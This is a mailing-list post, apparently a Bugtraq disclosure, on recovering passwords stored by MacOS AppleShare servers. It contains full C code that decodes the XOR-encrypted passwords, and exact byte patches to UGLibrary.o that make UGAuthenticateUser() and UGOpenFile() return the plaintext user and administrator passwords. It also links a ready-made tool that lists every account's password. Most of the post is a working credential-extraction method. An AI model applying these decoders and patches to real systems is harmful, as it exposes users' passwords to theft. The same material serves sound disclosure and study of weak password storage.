MacOS system encryption algorithm 3

[spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)]

    Sometime ago, Dawid adix Adamski <adixx () FRIKO4 ONET PL> sent to
    bugtraq the encryption algorithm in MacOS personal AppleShare
    server he found.

    I have been researching a little on this subject, and I've found
    his code fails when decoding the first character of the password,
    for this char you need additional data from the "Users & Groups
    Data File", specifically, the 4th byte after the encoded sequence
    described in his message.

    So, after cleaning a little the code, you get something as simple as
    this:

---------------------------------------------------------------------------
#include <stdio.h>

int main(){

    register int i=0;

    unsigned char *mask="rpcgtprk";
    unsigned char *pw="\x28\x08\x2F\x3B\x20\x36\x30\x5B\x00\x00\x00\x09";
    unsigned char c;

    for(i=0; i<7; i++)
    {
        c = pw[6-i] ^ mask[7-i];
        pw[7-i] ^= c;
    }
    c = pw[11] ^ mask[7-i];
    pw[7-i] ^= c;

    printf("\"%s\"\n",pw);
}
---------------------------------------------------------------------------

    But you still have to find the encrypted passwords in the binary
    data file.

    Apple's AppleShare SDK provides a "UGLibrary" to deal with this
    data file; but it doesn't let you access the user password (which
    is decrypted in the stack when you call "UGAuthenticateUser()",
    nor the encrypted one.

    In fact, in this call, the encrypted password is decrypted to the
    stack, and compared against the user supplied one.
    So, all we have to do is replace the compare with a copy:

* 00000206: B036 70F4      '.6p.'   CMP.B      -$0C(A6,D7.W),D0
* 0000020A: 6710           'g.'     BEQ.S      *+$0012             ; 0000021C
*
    is replaced with
*
* # ADDQ.W      #$02,A2             544A
* # MOVE.B      D0,-(A2)            1500
* # BRA.S       *+$0012             6010
*
* i.e., go to offset 28A0 and replace "B036 70F4 6710" with "544A 1500 6010"
* in "UGLibrary.o"

    After that, we can build a simple program (about 150 lines) and
    with just a double click, we get a listing with all the users
    and decoded passwords in the system.

    That's enough for the personal AppleShare server included with
    MacOS 7.x and 8.x; for AppleShare server 3.x (and, probably 4.x;
    I didn't check it) the data file is protected by a "administrator
    password" so you need it before being able to use the modified
    UGAuthenticateUser().
    But that password uses the same encryption algorithm/check as
    the users ones, so we only have to change "UGOpenFile()" in the
    same way:
    at offset 0A92, B030 7000 671A becomes 544A 1500 601A

    So, with these modifications, AppleShare 3.x admin password
    is returned into filePB.ugAdminKey after UGOpenFile() and
    users password are returned into userPB.ugPassword after
    UGAuthenticateUser(), both in plain text format.

    A program which uses this method for listing users and passwords
    can be found (both MacOS 68k binary and source code) at
    ftp://ivo.cps.unizar.es/pub/SPDsoft/ASPID.sit
    (Stuffit 5.x archive)

--
finger spd () gtc1 cps unizar es for PGP       /              So be easy and free
.mailcap tip of the day:                   /      when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null       /            (the pogues)